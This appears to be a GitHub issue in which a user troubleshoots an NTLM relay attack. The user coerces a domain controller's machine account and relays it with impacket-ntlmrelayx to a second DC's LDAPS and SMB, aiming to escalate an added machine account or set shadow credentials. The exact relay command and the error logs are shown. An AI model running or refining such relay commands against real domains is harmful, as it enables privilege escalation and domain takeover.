Ldap relay from DC1 machine account to DC2 using NTLMRelayx

Question

Ldap relay from DC1 machine account to DC2 using NTLMRelayx

Vellimakhlooq opened this issue 3 months ago · 0 comments

Hi, I am trying to perform coercion with coercer using ntlmrelayx script with the following options:

impacket-ntlmrelayx -t ldaps://192.168.0.20 --remove-mic -smb2support --escalate-user My_Added_Machine_Account$

I do get connection from DC1 machine account but unable to escalate privileges of my machine account or perform shadow credentials.

Here is the error I am getting:

[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.0.21, attacking target ldaps://192.168.0.20

[-] Connection against target ldaps://192.168.0.20 FAILED: socket ssl wrapping error: [Errno 104] Connection reset by peer

LDAPS is running on port 3268, it there any way to specify port for ldaps as well like we have for smb.

When I try to perform relay on smb I do get connection successful, but can't enumerate shares on DC2 using proxychains

*] SMBD-Thread-9 (process_request_thread): Received connection from 192.168.0.21, attacking target smb://192.168.0.20
[-] Signing is required, attack won't work unless using -remove-target / --remove-mic
[*] Authenticating against smb://192.168.0.20 as DOMAIN/DC1$ SUCCEED